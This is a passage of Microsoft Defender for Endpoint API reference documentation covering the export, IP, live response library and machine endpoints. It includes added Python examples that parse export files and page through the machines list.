        "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00002-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=BJ3SfwcyI7JnoTVhHAgiyvqWviA%2BUKdF80KeVIUc%2FIU%3D",
        "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1001/part-00005-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=6ZsI%2FysPufyNgx234GX8A5xVuz%2FtCtq%2FQ42R2P%2F3XO4%3D",
        "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-43b2fdb7-c985-4f14-bed5-ae66959a95a5/2022-07-26/1001/InfoGatheringExport/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=12275/part-00010-42240b35-4a40-45f7-9b46-96a5ce6d23b8.c000.json.gz?sv=2020-08-04&st=2022-07-26T13%3A36%3A30Z&se=2022-07-26T16%3A36%3A30Z&sr=b&sp=r&sig=iqJUkdUsR%2FvGL6hSA2Vqnv02%2BkRJtDhUReJHYd5TOdM%3D"
    ],
    "generatedTime": "2022-07-26T10:01:00Z"
}
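The two-step download flow described above (call the API for the download URLs, then fetch each gzip-compressed multiline JSON file and read it line by line), as an added Python example that is not part of the original article. The `http_get` callable, the storage URLs and every record field other than DeviceId are constructed assumptions.

```python
"""Fetch an information gathering export and decode its gzip-compressed
multiline JSON files, grouping the rows per device.

Added example, not Microsoft's code. `http_get` is an assumed callable that
takes a URL and returns the response body as bytes (a requests.get wrapper with
the bearer token in real use); the offline stub below serves a constructed
export response and constructed .json.gz blobs, and the record fields other
than DeviceId are constructed too.
"""
import gzip
import io
import json
from typing import Callable, Dict, Iterator, List

EXPORT_URL = "https://api.securitycenter.microsoft.com/api/machines/InfoGatheringExport"
MAX_SAS_VALID_HOURS = 24   # documented maximum for sasValidHours


def export_request_url(sas_valid_hours: int = 3) -> str:
    """Build the export URL; the download links stay valid for this many hours."""
    if not 1 <= sas_valid_hours <= MAX_SAS_VALID_HOURS:
        raise ValueError(f"sasValidHours must be between 1 and {MAX_SAS_VALID_HOURS}")
    return f"{EXPORT_URL}?$sasValidHours={sas_valid_hours}"


def iter_export_records(http_get: Callable[[str], bytes],
                        sas_valid_hours: int = 3) -> Iterator[dict]:
    """Step 1: ask the API for the download URLs. Step 2: download each file,
    gunzip it and parse it line by line (multiline JSON = one object per line)."""
    listing = json.loads(http_get(export_request_url(sas_valid_hours)))
    for url in listing["exportFiles"]:
        blob = http_get(url)
        with gzip.open(io.BytesIO(blob), mode="rt", encoding="utf-8") as lines:
            for line in lines:
                line = line.strip()
                if line:            # tolerate blank trailing lines
                    yield json.loads(line)


def records_by_device(http_get: Callable[[str], bytes]) -> Dict[str, List[dict]]:
    """Group the snapshot rows by DeviceId (the export has an entry per device)."""
    grouped: Dict[str, List[dict]] = {}
    for record in iter_export_records(http_get):
        grouped.setdefault(record["DeviceId"], []).append(record)
    return grouped


# ---- constructed offline stand-in for the API and Azure Storage ----------

def _gzip_ndjson(records: List[dict]) -> bytes:
    """Encode records the way the export files are stored: gzip of JSON lines."""
    buf = io.BytesIO()
    with gzip.open(buf, mode="wt", encoding="utf-8") as out:
        for record in records:
            out.write(json.dumps(record) + "\n")
    return buf.getvalue()


# Constructed URLs and rows; RbacGroupId mirrors the _RbacGroupId path segment
SAMPLE_FILES = {
    "https://storage.example.invalid/_RbacGroupId=0/part-00001.json.gz": _gzip_ndjson([
        {"DeviceId": "dev-1", "RbacGroupId": 0, "Field": "constructed"},
        {"DeviceId": "dev-2", "RbacGroupId": 0, "Field": "constructed"},
    ]),
    "https://storage.example.invalid/_RbacGroupId=1/part-00002.json.gz": _gzip_ndjson([
        {"DeviceId": "dev-3", "RbacGroupId": 1, "Field": "constructed"},
    ]),
}


def offline_http_get(url: str) -> bytes:
    """Answer the export call with the file list, and file URLs with their blobs."""
    if url.startswith(EXPORT_URL):
        return json.dumps({"exportFiles": list(SAMPLE_FILES),
                           "generatedTime": "2022-07-26T10:01:00Z"}).encode()
    return SAMPLE_FILES[url]


if __name__ == "__main__":
    for device_id, rows in records_by_device(offline_http_get).items():
        print(device_id, rows)
```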

Other related
DeviceTvmInfoGathering
DeviceTvmInfoGatheringKB
Vulnerability management
Vulnerabilities in your organization

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Get IP related alerts API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of alerts related to a given IP address.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | Read all alerts
Application | Alert.ReadWrite.All | Read and write all alerts
Delegated (work or school account) | Alert.Read | Read alerts
Delegated (work or school account) | Alert.ReadWrite | Read and write alerts

7 Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: View Data. For
more information, see Create and manage roles.
The response includes only alerts associated with devices that the user has
access to, based on device group settings. For more information, see Create and
manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/ips/{ip}/alerts

Request headers
Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and the IP exists - 200 OK with a list of alert entities in the body. If the
IP address is unknown but valid, it returns an empty set. If the IP address is invalid, it
returns HTTP 400.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/alerts

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Get IP statistics API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the statistics for the given IP.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
2. Maximum value for lookBackHours is 720 hours (30 days).

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Ip.Read.All | 'Read IP address profiles'
Delegated (work or school account) | Ip.Read.All | 'Read IP address profiles'

7 Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (For
more information, see Create and manage roles)

HTTP request
HTTP

GET /api/ips/{ip}/stats

Request headers
Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request URI parameters

Name | Type | Description
lookBackHours | Int32 | Defines the hours we search back to get the statistics. Defaults to 30 days. Optional.

Request body
Empty

Response
If successful and the IP exists - 200 OK with statistical data in the body. If the IP is
valid but doesn't exist - organizationPrevalence 0. If the IP is invalid - HTTP 400.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/stats?lookBackHours=48

Response example
Here's an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgIPStats",
    "ipAddress": "10.209.67.177",
    "organizationPrevalence": 63515,
    "orgFirstSeen": "2017-07-30T13:36:06Z",
    "orgLastSeen": "2017-08-29T13:32:59Z"
}

Name | Description
Organization prevalence | The distinct count of devices that opened a network connection to this IP.
Org first seen | The first connection for this IP in the organization.
Org last seen | The last connection for this IP in the organization.

7 Note

This statistic information is based on data from the past 30 days.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Live response library methods and properties
Article • 07/18/2023

Applies to: Microsoft Defender for Endpoint

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Methods
Method | Return Type | Description
List library files | Library file collection | List library file entities
Upload to library | Library file entity | Upload a file to live response library
Delete from library | No content | Delete library file entity

Properties
Property | Type | Description
Commands | Live Response command collection | Array of Command objects. See live response commands.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



List library files
Article • 09/27/2023

Applies to: Microsoft Defender for Endpoint

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
List live response library files.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Library.Manage | Manage live response library
Delegated (work or school account) | Library.Manage | Manage live response library

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/libraryfiles

Request headers
Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 - OK response code with a collection of live
response library file entities.

Example
Request

Here's an example of a request that gets all live response library files.
HTTP

GET https://api.securitycenter.microsoft.com/api/libraryfiles

Response example
Here's an example of the response.

JSON

HTTP/1.1 200 Ok
Content-type: application/json
{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#LibraryFiles",
    "value": [
        {
            "fileName": "script1.ps1",
            "sha256": "6e212a0db618507c44e4ec8ee7499dfef7e5767e5f8d31144df3b96fd1145caf",
            "description": null,
            "creationTime": "2019-10-24T10:54:23.2009016Z",
            "lastUpdatedTime": "2019-10-24T10:54:23.2009016Z",
            "createdBy": "admin",
            "hasParameters": true,
            "parametersDescription": "test"
        },
        {
            "fileName": "script.sh",
            "sha256": "d0f3e3b0641dbf88ee39c822516e81a909d1d06d22341dd9b1f12aa5e5c027a2",
            "description": null,
            "creationTime": "2018-10-24T11:15:35.3688259Z",
            "lastUpdatedTime": "2018-10-24T11:15:35.3688259Z",
            "createdBy": "username",
            "hasParameters": false
        },
        {
            "fileName": "memdump.exe",
            "sha256": "fa70b87730290c0d30fe255d1dfb65de82f96286ebfeeb1d88ed3cc831329825",
            "description": "Process memory dump",
            "creationTime": "2018-10-24T10:54:23.2009016Z",
            "lastUpdatedTime": "2018-10-24T10:54:23.2009016Z",
            "createdBy": "admin",
            "hasParameters": false
        }
    ]
}

Related article
Run live response

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Upload files to the live response library
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Upload file to live response library.

Limitations
1. The maximum file size is 20 MB.
2. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Library.Manage | Manage live response library
Delegated (work or school account) | Library.Manage | Manage live response library

HTTP request
Upload

HTTP

POST https://api.securitycenter.microsoft.com/api/libraryfiles

Request headers
Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | multipart/form-data. Required.

Request body
In the request body, supply a form-data object with the following parameters:

Parameter | Type | Description
File content | File | The file to be uploaded to the live response library. Required.
Description | String | Description of the file.
ParametersDescription | String | (Optional) Parameters required for the script to run. Default value is an empty string.
OverrideIfExists | Boolean | (Optional) Whether to override the file if it already exists. Default value is an empty string.

Response
If successful, this method returns 200 - OK response code and the uploaded live
response library entity in the response body.

If not successful, this method returns 400 - Bad Request, which usually indicates an
incorrect body.

Example
Request

Here is an example of the request using curl.

CURL

curl -X POST https://api.securitycenter.microsoft.com/api/libraryfiles \
  -H "Authorization: Bearer $token" \
  -F "file=@mdatp1.png" \
  -F "ParametersDescription=test" \
  -F "HasParameters=true" \
  -F "OverrideIfExists=true" \
  -F "Description=test description"

Related topic
Run live response

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Delete a file from the live response library
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Delete a file from live response library.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Get started.

Permission type | Permission | Permission display name
Application | Library.Manage | Manage live response library
Delegated (work or school account) | Library.Manage | Manage live response library

HTTP request
DELETE https://api.securitycenter.microsoft.com/api/libraryfiles/{fileName}

Request headers
Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If the file exists in the library and was deleted successfully - 204 No Content.

If the specified file name was not found - 404 Not Found.

Example
Request
Here is an example of the request.

HTTP

DELETE https://api.securitycenter.microsoft.com/api/libraryfiles/script1.ps1

Related topic
Run live response

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Machine resource type
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Methods
Method | Return Type | Description
List machines | machine collection | List set of machine entities in the org.
Get machine | machine | Get a machine by its identity.
Get logged on users | user collection | Get the set of User that logged on to the machine.
Get related alerts | alert collection | Get the set of alert entities that were raised on the machine.
Get installed software | software collection | Retrieves a collection of installed software related to a given machine ID.
Get discovered vulnerabilities | vulnerability collection | Retrieves a collection of discovered vulnerabilities related to a given machine ID.
Get security recommendations | recommendation collection | Retrieves a collection of security recommendations related to a given machine ID.
Add or Remove machine tags | machine | Add or Remove tag to a specific machine.
Find machines by IP | machine collection | Find machines seen with IP.
Find machines by tag | machine collection | Find machines by Tag.
Get missing KBs | KB collection | Get a list of missing KBs associated with the machine ID.
Set device value | machine collection | Set the value of a device.
Update machine | machine collection | Get the update status of a machine.

Properties
Property | Type | Description
id | String | machine identity.
computerDnsName | String | machine fully qualified name.
firstSeen | DateTimeOffset | First date and time where the machine was observed by Microsoft Defender for Endpoint.
lastSeen | DateTimeOffset | Time and date of the last received full device report. A device typically sends a full report every 24 hours. NOTE: This property doesn't correspond to the last seen value in the UI. It pertains to the last device update.
osPlatform | String | Operating system platform.
onboardingstatus | String | Status of machine onboarding. Possible values are: onboarded, CanBeOnboarded, Unsupported, and InsufficientInfo.
osProcessor | String | Operating system processor. Use osArchitecture property instead.
version | String | Operating system Version.
osBuild | Nullable long | Operating system build number.
lastIpAddress | String | Last IP on local NIC on the machine.
lastExternalIpAddress | String | Last IP through which the machine accessed the internet.
healthStatus | Enum | machine health status. Possible values are: Active, Inactive, ImpairedCommunication, NoSensorData, NoSensorDataImpairedCommunication, and Unknown.
rbacGroupName | String | Machine group Name.
rbacGroupId | String | Machine group ID.
riskScore | Nullable Enum | Risk score as evaluated by Microsoft Defender for Endpoint. Possible values are: None, Informational, Low, Medium, and High.
aadDeviceId | Nullable representation Guid | Microsoft Entra Device ID (when machine is Microsoft Entra joined).
machineTags | String collection | Set of machine tags.
exposureLevel | Nullable Enum | Exposure level as evaluated by Microsoft Defender for Endpoint. Possible values are: None, Low, Medium, and High.
deviceValue | Nullable Enum | The value of the device. Possible values are: Normal, Low, and High.
ipAddresses | IpAddress collection | Set of IpAddress objects. See Get machines API.
osArchitecture | String | Operating system architecture. Possible values are: 32-bit, 64-bit. Use this property instead of osProcessor.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



List machines API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Machines that have communicated with Microsoft Defender for
Endpoint cloud.

Supports OData V4 queries.

The OData $filter query is supported on: computerDnsName, id, version, deviceValue,
aadDeviceId, machineTags, lastSeen, exposureLevel, onboardingStatus, lastIpAddress,
healthStatus, osPlatform, riskScore and rbacGroupId.

$top with max value of 10,000

$skip

See examples at OData queries with Defender for Endpoint

Limitations
You can get devices last seen according to your configured retention period.
Maximum page size is 10,000.
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

7 Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (For
more information, see Create and manage roles)
The response will include only devices that the user has access to, based on
device group settings (For more information, see Create and manage device
groups)

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/machines

Request headers
ノ Expand table

Name Type Description

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and machines exist - 200 OK with a list of machine entities in the body. If
there are no recent machines - 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines

Response example
Here's an example of the response.

HTTP

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"version": "1709",
"osProcessor": "x64",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"exposureLevel": "Medium",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
...
]
}
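An added Python example (not Microsoft's code) that builds an OData `$filter` restricted to the properties listed above and walks the result set with `$top`/`$skip` within the 10,000 page-size limit, treating the documented 404 as an empty result. The `http_get` callable and the sample machine rows are constructed assumptions; the stale-device filter is one realistic use of `lastSeen` and `healthStatus`.

```python
"""Page through the List machines API with OData $filter, $top and $skip.

Added example, not Microsoft's code. `http_get` is an assumed callable taking a
URL and returning (status_code, body_bytes), a requests.get wrapper with the
bearer token in real use. The offline stub and its machine rows are constructed
so the paging and filter logic can run without a tenant.
"""
import json
import re
from datetime import datetime
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

MACHINES_URL = "https://api.securitycenter.microsoft.com/api/machines"
MAX_PAGE_SIZE = 10_000   # documented maximum for $top and page size

# Properties the article lists as supported by $filter
FILTERABLE = {
    "computerDnsName", "id", "version", "deviceValue", "aadDeviceId", "machineTags",
    "lastSeen", "exposureLevel", "onboardingStatus", "lastIpAddress", "healthStatus",
    "osPlatform", "riskScore", "rbacGroupId",
}


def build_filter(**conditions: Tuple[str, object]) -> str:
    """Turn {property: (operator, value)} into an OData $filter, rejecting
    properties the API does not support. datetimes are emitted unquoted in
    ISO 8601 form (OData v4 literals); strings are single-quoted."""
    clauses = []
    for prop, (op, value) in conditions.items():
        if prop not in FILTERABLE:
            raise ValueError(f"{prop} is not supported by $filter on this API")
        if isinstance(value, datetime):
            literal = value.strftime("%Y-%m-%dT%H:%M:%SZ")
        elif isinstance(value, bool):
            literal = "true" if value else "false"
        elif isinstance(value, int):
            literal = str(value)
        else:
            literal = "'" + str(value).replace("'", "''") + "'"
        clauses.append(f"{prop} {op} {literal}")
    return " and ".join(clauses)


def stale_inactive_filter(cutoff: datetime) -> str:
    """Filter for inactive devices not seen since `cutoff` (an inventory-hygiene check)."""
    return build_filter(healthStatus=("eq", "Inactive"), lastSeen=("lt", cutoff))


def list_machines(http_get: Callable[[str], Tuple[int, bytes]],
                  odata_filter: str = "",
                  page_size: int = MAX_PAGE_SIZE) -> List[dict]:
    """Collect every machine entity, walking pages with $top/$skip."""
    if not 1 <= page_size <= MAX_PAGE_SIZE:
        raise ValueError(f"page size must be between 1 and {MAX_PAGE_SIZE}")
    machines: List[dict] = []
    skip = 0
    while True:
        params: Dict[str, object] = {"$top": page_size, "$skip": skip}
        if odata_filter:
            params["$filter"] = odata_filter
        status, body = http_get(f"{MACHINES_URL}?{urlencode(params, safe='$')}")
        if status == 404:          # documented: no recent machines
            break
        if status != 200:
            raise RuntimeError(f"List machines returned HTTP {status}")
        page = json.loads(body)["value"]
        machines.extend(page)
        if len(page) < page_size:  # a short page is the last one
            break
        skip += page_size
    return machines


# ---- constructed offline stand-in for the API -------------------------------

SAMPLE_MACHINES = [
    {"id": f"constructed-id-{n}", "computerDnsName": f"host{n}.contoso.com",
     "healthStatus": "Active" if n % 2 == 0 else "Inactive", "riskScore": "Low"}
    for n in range(5)
]


def offline_http_get(url: str) -> Tuple[int, bytes]:
    """Serve SAMPLE_MACHINES; understands $top, $skip and one `prop eq 'value'`."""
    query = parse_qs(urlparse(url).query)
    top = int(query["$top"][0])
    skip = int(query.get("$skip", ["0"])[0])
    rows = SAMPLE_MACHINES
    match = re.fullmatch(r"(\w+) eq '([^']*)'", query.get("$filter", [""])[0])
    if match:
        rows = [m for m in rows if str(m.get(match.group(1))) == match.group(2)]
    if not rows:
        return 404, b""
    body = {"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
            "value": rows[skip:skip + top]}
    return 200, json.dumps(body).encode()


if __name__ == "__main__":
    inactive = list_machines(offline_http_get,
                             build_filter(healthStatus=("eq", "Inactive")), page_size=2)
    print([m["computerDnsName"] for m in inactive])
```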

Related articles
OData queries with Microsoft Defender for Endpoint

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Get machine by ID API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves specific Machine by its device ID or computer name.

Limitations
1. You can get devices last seen according to your configured retention policy.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

7 Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data' (See
Create and manage roles for more information)
The user needs to have access to the device, based on device group settings
(See Create and manage device groups for more information)

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/machines/{id}

Request headers
ノ Expand table

Name Type Description

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and device exists - 200 OK with the machine entity in the body. If machine
with the specified ID wasn't found - 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07

Response example
Here's an example of the response.

HTTP

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Machine",
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"version": "1709",
"osProcessor": "x64",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"exposureLevel": "Medium",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Get machine logon users API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

7 Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

 Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of logged on users on a specific device.

Limitations
1. You can query on devices last updated according to your configured retention period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | User.Read.All | 'Read user profiles'
Delegated (work or school account) | User.Read.All | 'Read user profiles'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data'. For more information, see Create and manage roles.
- The response will include users only if the device is visible to the user, based on device group settings. For more information, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/machines/{id}/logonusers

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and device exists - 200 OK with list of user entities in the body. If device wasn't found - 404 Not Found.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/logonusers

Response
Here's an example of the response.

HTTP

HTTP/1.1 200 OK
Content-type: application/json
{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Users",
    "value": [
        {
            "id": "contoso\\user1",
            "accountName": "user1",
            "accountDomain": "contoso",
            "firstSeen": "2019-12-18T08:02:54Z",
            "lastSeen": "2020-01-06T08:01:48Z",
            "logonTypes": "Interactive",
            "isDomainAdmin": true,
            "isOnlyNetworkUser": false
        },
        ...
    ]
}
